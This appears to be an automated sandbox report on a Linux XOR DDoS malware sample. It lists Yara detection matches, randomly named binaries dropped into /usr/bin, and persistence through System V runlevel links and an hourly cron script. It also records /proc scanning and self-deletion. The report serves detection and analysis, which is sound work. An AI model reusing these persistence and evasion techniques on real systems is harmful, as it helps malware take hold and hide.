                    Source: Yara matchFile source: 4966.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5199.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5221.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5485.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4801.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5133.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4688.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4655.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4823.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5111.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5507.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4955.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5177.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5155.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4779.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 4ljhdTTyiA PID: 5054, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 4ljhdTTyiA PID: 5507, type: MEMORY
                    Source: Yara matchFile source: /usr/bin/nyavevzqtw, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/uoewtvxqdd, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/dxeguomyxc, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/jjltawydwf, type: DROPPED
                    Source: Yara matchFile source: /lib/libudev.so, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/ctrygxclrx, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/rlyjyybyum, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/tjdqviitkh, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/fcxqfstrdm, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/aspbnnkmso, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/ouhdchrbdz, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/lgnmbyzzlq, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/gqczobuacc, type: DROPPED

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 4ljhdTTyiA, type: SAMPLEMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/uoewtvxqdd, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/dxeguomyxc, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/jjltawydwf, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /lib/libudev.so, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/ctrygxclrx, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/rlyjyybyum, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/tjdqviitkh, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/fcxqfstrdm, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/aspbnnkmso, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/ouhdchrbdz, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/lgnmbyzzlq, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: /usr/bin/gqczobuacc, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
                    Source: 4ljhdTTyiA, type: SAMPLEMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/uoewtvxqdd, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/dxeguomyxc, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/jjltawydwf, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /lib/libudev.so, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/ctrygxclrx, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/rlyjyybyum, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/tjdqviitkh, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/fcxqfstrdm, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/aspbnnkmso, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/ouhdchrbdz, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/lgnmbyzzlq, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: /usr/bin/gqczobuacc, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
                    Source: classification engineClassification label: mal100.troj.evad.lin@0/21@5/0
                    Source: /tmp/4ljhdTTyiA (PID: 4554)/run/gcc.pid: gwbbeuannjaetwafyolmnmkmuwlnwvcfJump to behavior

                    Persistence and Installation Behavior:

                    barindex
                    Sample tries to persist itself using System V runlevelsShow sources
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc1.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc2.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc3.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc4.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc5.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc.d/rc1.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc.d/rc2.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc.d/rc3.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc.d/rc4.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/rc.d/rc5.d/S904ljhdTTyiA -> /etc/init.d/4ljhdTTyiAJump to behavior
                    Source: /usr/lib/insserv/insserv (PID: 4609)File: /etc/rc1.d/S014ljhdTTyiA -> ../init.d/4ljhdTTyiAJump to behavior
                    Source: /usr/lib/insserv/insserv (PID: 4609)File: /etc/rc2.d/S014ljhdTTyiA -> ../init.d/4ljhdTTyiAJump to behavior
                    Source: /usr/lib/insserv/insserv (PID: 4609)File: /etc/rc3.d/S014ljhdTTyiA -> ../init.d/4ljhdTTyiAJump to behavior
                    Source: /usr/lib/insserv/insserv (PID: 4609)File: /etc/rc4.d/S014ljhdTTyiA -> ../init.d/4ljhdTTyiAJump to behavior
                    Source: /usr/lib/insserv/insserv (PID: 4609)File: /etc/rc5.d/S014ljhdTTyiA -> ../init.d/4ljhdTTyiAJump to behavior
                    Sample tries to persist itself using cronShow sources
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/cron.hourly/gcc.shJump to behavior
                    Source: /bin/dash (PID: 4590)File: /etc/crontabJump to behavior
                    Source: /bin/sed (PID: 4592)File: /etc/crontabJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4690/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4770/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1065/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3485/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3484/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1062/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3482/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3481/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1060/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/550/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1017/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1059/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3479/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3512/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3477/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1452/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3432/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3632/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3678/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3518/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1339/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4726/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4803/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4781/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3497/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3133/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3452/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3496/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1072/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3491/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3527/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3525/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1346/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3524/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3601/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3523/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1024/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1145/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3488/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3565/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3289/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3443/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4657/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3606/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/2516/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4737/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4814/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4792/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4475/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1363/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3541/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1362/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3463/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/2251/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3262/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1084/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3380/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/496/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3611/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3377/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1155/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1078/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/535/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4701/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4669/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1119/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3616/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4748/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1091/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3790/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3791/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/2386/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3310/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3431/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3596/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3473/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3550/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1095/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3625/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1688/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3502/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3546/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3303/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3501/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3545/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/1443/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3467/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3543/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4679/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3308/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/3429/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4517/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4715/fdJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File opened: /proc/4759/fdJump to behavior
                    Source: /usr/sbin/update-rc.d (PID: 4646)Systemctl executable: /bin/systemctl -> systemctl daemon-reloadJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Reads from proc file: /proc/statJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Reads from proc file: /proc/meminfoJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Reads from proc file: /proc/cpuinfoJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /lib/libudev.soJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/jjltawydwfJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/ouhdchrbdzJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/fcxqfstrdmJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/dxeguomyxcJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/ctrygxclrxJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/gqczobuaccJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/uoewtvxqddJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/rlyjyybyumJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/tjdqviitkhJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/aspbnnkmsoJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/lgnmbyzzlqJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File written: /usr/bin/nyavevzqtwJump to dropped file
                    Source: /bin/sed (PID: 4592)Crontab like entry written: /etc/sed4RcMLwJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Writes shell script file to disk with an unusual file extension: /etc/init.d/4ljhdTTyiAJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Shell script file created: /etc/cron.hourly/gcc.shJump to dropped file

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Drops files in suspicious directoriesShow sources
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /etc/init.d/4ljhdTTyiAJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/jjltawydwfJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/ouhdchrbdzJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/fcxqfstrdmJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/dxeguomyxcJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/ctrygxclrxJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/gqczobuaccJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/uoewtvxqddJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/rlyjyybyumJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/tjdqviitkhJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/aspbnnkmsoJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/lgnmbyzzlqJump to dropped file
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/nyavevzqtwJump to dropped file
                    Source: /usr/lib/insserv/insserv (PID: 4609)File: /etc/init.d/.depend.bootJump to dropped file
                    Source: /usr/lib/insserv/insserv (PID: 4609)File: /etc/init.d/.depend.startJump to dropped file
                    Source: /usr/lib/insserv/insserv (PID: 4609)File: /etc/init.d/.depend.stopJump to dropped file
                    Sample deletes itselfShow sources
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/jjltawydwfJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/ouhdchrbdzJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/fcxqfstrdmJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/dxeguomyxcJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/ctrygxclrxJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/gqczobuaccJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/uoewtvxqddJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/rlyjyybyumJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/tjdqviitkhJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/aspbnnkmsoJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/lgnmbyzzlqJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/nyavevzqtwJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/tstbdpivhlJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/lndoiatruxJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/nefhkhnwwhJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/bjhmdsecwaJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/otvvhyamwsJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/aysistkyqnJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/flwslywqdxJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/neofzderabJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/yxfexdygglJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/taocfwkdjvJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/vhplhrsffzJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/vdaqfdcrtxJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/vyvijtmtnzJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/vggdimllrzJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/dowmukqhnkJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/ejrpibbjioJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/ztfvwcbmzmJump to behavior
                    Source: /tmp/4ljhdTTyiA (PID: 4554)File: /usr/bin/getzgxvgylJump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4657)File: /usr/bin/jjltawydwfJump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4669)File: /usr/bin/jjltawydwfJump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4679)File: /usr/bin/jjltawydwfJump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4690)File: /usr/bin/jjltawydwfJump to behavior
                    Source: /usr/bin/jjltawydwf (PID: 4701)File: /usr/bin/jjltawydwfJump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4715)File: /usr/bin/ouhdchrbdzJump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4726)File: /usr/bin/ouhdchrbdzJump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4737)File: /usr/bin/ouhdchrbdzJump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4748)File: /usr/bin/ouhdchrbdzJump to behavior
                    Source: /usr/bin/ouhdchrbdz (PID: 4759)File: /usr/bin/ouhdchrbdzJump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4770)File: /usr/bin/fcxqfstrdmJump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4781)File: /usr/bin/fcxqfstrdmJump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4792)File: /usr/bin/fcxqfstrdmJump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4803)File: /usr/bin/fcxqfstrdmJump to behavior
                    Source: /usr/bin/fcxqfstrdm (PID: 4814)File: /usr/bin/fcxqfstrdmJump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4825)File: /usr/bin/dxeguomyxcJump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4836)File: /usr/bin/dxeguomyxcJump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4847)File: /usr/bin/dxeguomyxcJump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4859)File: /usr/bin/dxeguomyxcJump to behavior
                    Source: /usr/bin/dxeguomyxc (PID: 4869)File: /usr/bin/dxeguomyxcJump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4880)File: /usr/bin/ctrygxclrxJump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4891)File: /usr/bin/ctrygxclrxJump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4902)File: /usr/bin/ctrygxclrxJump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4913)File: /usr/bin/ctrygxclrxJump to behavior
                    Source: /usr/bin/ctrygxclrx (PID: 4924)File: /usr/bin/ctrygxclrxJump to behavior
                    Source: /usr/bin/gqczobuacc (PID: 4935)File: /usr/bin/gqczobuaccJump to behavior
